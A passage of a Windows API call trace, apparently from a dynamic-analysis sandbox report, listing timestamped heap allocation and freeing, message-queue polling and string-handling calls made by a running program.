lpMem=0x2498ed8 | out: hHeap=0x25c0000) returned 1 [0133.150] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.150] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbd0 [0133.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ed8 [0133.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ef0 [0133.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbc0 [0133.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ea8 [0133.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ec0 [0133.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbf0 [0133.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f38 [0133.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f80 [0133.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbe0 [0133.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f98 [0133.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbe0 | out: hHeap=0x25c0000) returned 1 [0133.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f68 [0133.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbe0 [0133.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbe0 | out: hHeap=0x25c0000) returned 1 [0133.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f50 [0133.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbe0 [0133.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbe0 | out: hHeap=0x25c0000) returned 1 [0133.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f20 [0133.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbe0 [0133.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f08 [0133.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f98 | out: hHeap=0x25c0000) returned 1 [0133.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f80 | out: hHeap=0x25c0000) returned 1 [0133.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f68 | out: hHeap=0x25c0000) returned 1 [0133.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f50 | out: hHeap=0x25c0000) returned 1 [0133.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f38 | out: hHeap=0x25c0000) returned 1 [0133.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbf0 | out: hHeap=0x25c0000) returned 1 [0133.151] lstrlenW (lpString="44") returned 2 [0133.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f20 | out: hHeap=0x25c0000) returned 1 [0133.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbe0 | out: hHeap=0x25c0000) returned 1 [0133.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f08 | out: hHeap=0x25c0000) returned 1 [0133.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ec0 | out: hHeap=0x25c0000) returned 1 [0133.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ea8 | out: hHeap=0x25c0000) returned 1 [0133.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbc0 | out: hHeap=0x25c0000) returned 1 [0133.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ea8 [0133.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ec0 [0133.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbc0 [0133.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ef0 | out: hHeap=0x25c0000) returned 1 [0133.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ed8 | out: hHeap=0x25c0000) returned 1 [0133.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbd0 | out: hHeap=0x25c0000) returned 1 [0133.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ec0 | out: hHeap=0x25c0000) returned 1 [0133.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbc0 | out: hHeap=0x25c0000) returned 1 [0133.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ea8 | out: hHeap=0x25c0000) returned 1 [0133.152] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.153] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbc0 [0133.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ea8 [0133.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ec0 [0133.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbd0 [0133.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ed8 [0133.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ef0 [0133.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbe0 [0133.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f08 [0133.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f20 [0133.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbf0 [0133.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f38 [0133.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbf0 | out: hHeap=0x25c0000) returned 1 [0133.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f50 [0133.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbf0 [0133.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbf0 | out: hHeap=0x25c0000) returned 1 [0133.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f68 [0133.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbf0 [0133.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbf0 | out: hHeap=0x25c0000) returned 1 [0133.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f80 [0133.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbf0 [0133.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f98 [0133.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f38 | out: hHeap=0x25c0000) returned 1 [0133.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f20 | out: hHeap=0x25c0000) returned 1 [0133.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f50 | out: hHeap=0x25c0000) returned 1 [0133.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f68 | out: hHeap=0x25c0000) returned 1 [0133.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f08 | out: hHeap=0x25c0000) returned 1 [0133.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbe0 | out: hHeap=0x25c0000) returned 1 [0133.155] lstrlenW (lpString="69") returned 2 [0133.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f80 | out: hHeap=0x25c0000) returned 1 [0133.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbf0 | out: hHeap=0x25c0000) returned 1 [0133.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f98 | out: hHeap=0x25c0000) returned 1 [0133.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ef0 | out: hHeap=0x25c0000) returned 1 [0133.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ed8 | out: hHeap=0x25c0000) returned 1 [0133.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbd0 | out: hHeap=0x25c0000) returned 1 [0133.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ed8 [0133.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ef0 [0133.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbd0 [0133.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ec0 | out: hHeap=0x25c0000) returned 1 [0133.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ea8 | out: hHeap=0x25c0000) returned 1 [0133.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbc0 | out: hHeap=0x25c0000) returned 1 [0133.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ef0 | out: hHeap=0x25c0000) returned 1 [0133.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbd0 | out: hHeap=0x25c0000) returned 1 [0133.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ed8 | out: hHeap=0x25c0000) returned 1 [0133.156] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.156] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbd0 [0133.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ed8 [0133.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ef0 [0133.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbc0 [0133.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ea8 [0133.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ec0 [0133.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbf0 [0133.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f98 [0133.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f80 [0133.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbe0 [0133.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f08 [0133.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbe0 | out: hHeap=0x25c0000) returned 1 [0133.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f68 [0133.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbe0 [0133.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbe0 | out: hHeap=0x25c0000) returned 1 [0133.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f50 [0133.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbe0 [0133.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbe0 | out: hHeap=0x25c0000) returned 1 [0133.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f20 [0133.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbe0 [0133.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f38 [0133.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f08 | out: hHeap=0x25c0000) returned 1 [0133.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f80 | out: hHeap=0x25c0000) returned 1 [0133.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f68 | out: hHeap=0x25c0000) returned 1 [0133.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f50 | out: hHeap=0x25c0000) returned 1 [0133.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f98 | out: hHeap=0x25c0000) returned 1 [0133.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbf0 | out: hHeap=0x25c0000) returned 1 [0133.158] lstrlenW (lpString="72") returned 2 [0133.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f20 | out: hHeap=0x25c0000) returned 1 [0133.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbe0 | out: hHeap=0x25c0000) returned 1 [0133.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f38 | out: hHeap=0x25c0000) returned 1 [0133.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ec0 | out: hHeap=0x25c0000) returned 1 [0133.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ea8 | out: hHeap=0x25c0000) returned 1 [0133.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbc0 | out: hHeap=0x25c0000) returned 1 [0133.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ea8 [0133.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ec0 [0133.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbc0 [0133.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ef0 | out: hHeap=0x25c0000) returned 1 [0133.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ed8 | out: hHeap=0x25c0000) returned 1 [0133.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbd0 | out: hHeap=0x25c0000) returned 1 [0133.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x2465a78 [0133.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e48 | out: hHeap=0x25c0000) returned 1 [0133.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ec0 | out: hHeap=0x25c0000) returned 1 [0133.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbc0 | out: hHeap=0x25c0000) returned 1 [0133.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ea8 | out: hHeap=0x25c0000) returned 1 [0133.159] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d720 | out: hHeap=0x25c0000) returned 1 [0133.159] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbc0 | out: hHeap=0x25c0000) returned 1 [0133.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ea8 | out: hHeap=0x25c0000) returned 1 [0133.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ec0 | out: hHeap=0x25c0000) returned 1 [0133.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d078 | out: hHeap=0x25c0000) returned 1 [0133.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e18 | out: hHeap=0x25c0000) returned 1 [0133.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e00 | out: hHeap=0x25c0000) returned 1 [0133.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249da98 | out: hHeap=0x25c0000) returned 1 [0133.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb80 | out: hHeap=0x25c0000) returned 1 [0133.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249da70 | out: hHeap=0x25c0000) returned 1 [0133.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e90 | out: hHeap=0x25c0000) returned 1 [0133.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e30 | out: hHeap=0x25c0000) returned 1 [0133.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb90 | out: hHeap=0x25c0000) returned 1 [0133.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249dac0 | out: hHeap=0x25c0000) returned 1 [0133.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e78 | out: hHeap=0x25c0000) returned 1 [0133.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e60 | out: hHeap=0x25c0000) returned 1 [0133.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249db10 | out: hHeap=0x25c0000) returned 1 [0133.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbb0 | out: hHeap=0x25c0000) returned 1 [0133.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249dae8 | out: hHeap=0x25c0000) returned 1 [0133.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498de8 | out: hHeap=0x25c0000) returned 1 [0133.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb70 | out: hHeap=0x25c0000) returned 1 [0133.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498968 | out: hHeap=0x25c0000) returned 1 [0133.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498dd0 | out: hHeap=0x25c0000) returned 1 [0133.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498db8 | out: hHeap=0x25c0000) returned 1 [0133.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498da0 | out: hHeap=0x25c0000) returned 1 [0133.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb60 | out: hHeap=0x25c0000) returned 1 [0133.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498950 | out: hHeap=0x25c0000) returned 1 [0133.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb40 | out: hHeap=0x25c0000) returned 1 [0133.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498d88 | out: hHeap=0x25c0000) returned 1 [0133.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ea8 | out: hHeap=0x25c0000) returned 1 [0133.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498da0 | out: hHeap=0x25c0000) returned 1 [0133.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ea8 | out: hHeap=0x25c0000) returned 1 [0133.161] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249dac0 | out: hHeap=0x25c0000) returned 1 [0133.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbb0 | out: hHeap=0x25c0000) returned 1 [0133.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb90 | out: hHeap=0x25c0000) returned 1 [0133.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e78 | out: hHeap=0x25c0000) returned 1 [0133.161] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e90 | out: hHeap=0x25c0000) returned 1 [0133.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e18 | out: hHeap=0x25c0000) returned 1 [0133.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249da98 | out: hHeap=0x25c0000) returned 1 [0133.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb80 | out: hHeap=0x25c0000) returned 1 [0133.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e90 | out: hHeap=0x25c0000) returned 1 [0133.161] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbe0 | out: hHeap=0x25c0000) returned 1 [0133.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbf0 | out: hHeap=0x25c0000) returned 1 [0133.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f38 | out: hHeap=0x25c0000) returned 1 [0133.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ef0 | out: hHeap=0x25c0000) returned 1 [0133.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ed8 | out: hHeap=0x25c0000) returned 1 [0133.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbe0 | out: hHeap=0x25c0000) returned 1 [0133.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbe0 | out: hHeap=0x25c0000) returned 1 [0133.162] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc10 | out: hHeap=0x25c0000) returned 1 [0133.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc10 | out: hHeap=0x25c0000) returned 1 [0133.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc10 | out: hHeap=0x25c0000) returned 1 [0133.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f68 | out: hHeap=0x25c0000) returned 1 [0133.198] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.198] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.198] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.198] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.198] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.198] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.198] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.199] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.199] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.199] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.199] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.199] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.199] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.199] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.199] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.199] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.199] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.199] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.199] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.199] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.199] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.199] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.199] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 